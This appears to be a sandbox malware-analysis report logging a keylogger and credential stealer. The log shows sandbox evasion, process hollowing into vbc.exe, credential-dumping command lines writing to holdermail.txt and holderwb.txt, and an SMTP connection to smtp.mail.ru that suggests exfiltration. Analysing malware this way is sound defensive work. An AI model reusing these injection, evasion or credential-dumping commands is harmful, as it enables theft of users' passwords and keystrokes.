                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: svchost.exe, svchost.exe, 0000000A.00000002.491311478.0000000003641000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.273163025.0000000002C41000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: svchost.exe, 00000004.00000002.259142948.0000000000F32000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000000.254608825.0000000000BC2000.00000002.00020000.sdmp, svchost.exe, 00000013.00000000.267457896.0000000000322000.00000002.00020000.sdmpBinary or memory string: SBIEDLL.DLL+SOFTWARE\VALVE\STEAM\
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4884Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4884Thread sleep time: -200000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 4884Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 3136Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 476Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 5164Thread sleep time: -140000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 3016Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 6276Thread sleep count: 1079 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe TID: 1748Thread sleep count: 1121 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe TID: 5276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe TID: 464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6200Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6672Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6688Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6688Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6692Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6688Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 7100Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696Thread sleep time: -2600000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696Thread sleep time: -200000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6696Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 6496Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe TID: 6812Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWindow / User API: threadDelayed 1079Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeWindow / User API: threadDelayed 1121Jump to behavior
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeWindow / User API: threadDelayed 560
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeCode function: 7_2_006D3EC6 sldt word ptr [eax]7_2_006D3EC6
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: GetAdaptersInfo,5_2_05292D72
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: GetAdaptersInfo,5_2_05292D4A
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeThread delayed: delay time: 120000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeThread delayed: delay time: 140000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeThread delayed: delay time: 100000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeThread delayed: delay time: 100000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeThread delayed: delay time: 100000
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\CureMe\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile opened: C:\Vaccine\4535425425342grt45454s5s4\Jump to behavior
                    Source: svchost.exe, 0000000D.00000002.491370590.000001990D661000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                    Source: svchost.exe, 0000000D.00000002.490046729.0000019908029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 00000004.00000002.262341975.00000000014AE000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.490695793.00000000010E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_00405C6C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,1_2_00405C6C
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004052DC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004052DC
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_004026B9 FindFirstFileA,1_2_004026B9
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeCode function: 1_2_00405CAA GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405CAA
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: Debug
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeCode function: 5_2_05207920 LdrInitializeThunk,5_2_05207920
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion:

                    barindex
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeDomain query: smtp.mail.ru
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeNetwork Connect: 94.100.180.160 587
                    Allocates memory in foreign processesShow sources
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Sample uses process hollowing techniqueShow sources
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regionsShow sources
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    .NET source code references suspicious native API functionsShow sources
                    Source: taskhost.exe.1.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: taskhost.exe.1.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: iExplorer.exe.1.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: iExplorer.exe.1.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: WindowsUpdate.exe.5.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: WindowsUpdate.exe.5.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: Windows Update.exe.7.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: Windows Update.exe.7.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe 'C:\Users\user\AppData\Local\Temp\svchost.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\taskhost.exe 'C:\Users\user\AppData\Local\Temp\taskhost.exe' Jump to behavior
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exeProcess created: C:\Users\user\AppData\Local\Temp\iExplorer.exe 'C:\Users\user\AppData\Local\Temp\iExplorer.exe' Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2200Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe 'C:\Users\user\AppData\Roaming\Windows Update.exe' Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2324
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmpBinary or memory string: edProgram Manager
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmpBinary or memory string: Program Manager(
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmpBinary or memory string: Program Manager
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (11:09:22 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (12:19:16 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (10:59:22 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (9:36:07 AM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (12:22:36 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.492263729.0000000003CFD000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (12:30:56 PM) -----|
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (9:47:47 AM) -----|
                    Source: svchost.exe, 0000000A.00000002.491966567.0000000003ACF000.00000004.00000001.sdmpBinary or memory string: |-----Program Manager (9:39:27 AM) -----|
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
